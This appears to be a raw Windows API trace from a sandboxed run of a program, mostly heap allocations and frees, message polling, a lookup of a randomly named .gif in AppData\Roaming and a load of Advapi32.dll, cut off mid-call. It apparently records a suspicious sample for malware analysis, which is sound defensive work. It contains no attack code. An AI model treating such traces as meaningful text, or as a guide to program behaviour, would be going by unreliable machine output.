PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0195.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/bXPQ0g368kO FpGH2kMH.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52104100, ftCreationTime.dwHighDateTime=0x1d4c566, ftLastAccessTime.dwLowDateTime=0x40d543c0, ftLastAccessTime.dwHighDateTime=0x1d4cdb5, ftLastWriteTime.dwLowDateTime=0x40d543c0, ftLastWriteTime.dwHighDateTime=0x1d4cdb5, nFileSizeHigh=0x0, nFileSizeLow=0x129d0, dwReserved0=0xb570039, dwReserved1=0x11a18, cFileName="bXPQ0g368kO FpGH2kMH.gif", cAlternateFileName="BXPQ0G~1.GIF")) returned 0xaa57e0 [0195.491] FindClose (in: hFindFile=0xaa57e0 | out: hFindFile=0xaa57e0) returned 1 [0195.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0195.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.493] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.493] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0195.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0195.493] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.494] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.494] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.494] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.495] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.495] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.495] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.496] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.496] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.497] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0195.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0195.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.498] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.498] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.499] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.499] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0195.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.541] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0195.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0195.542] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.542] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.542] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 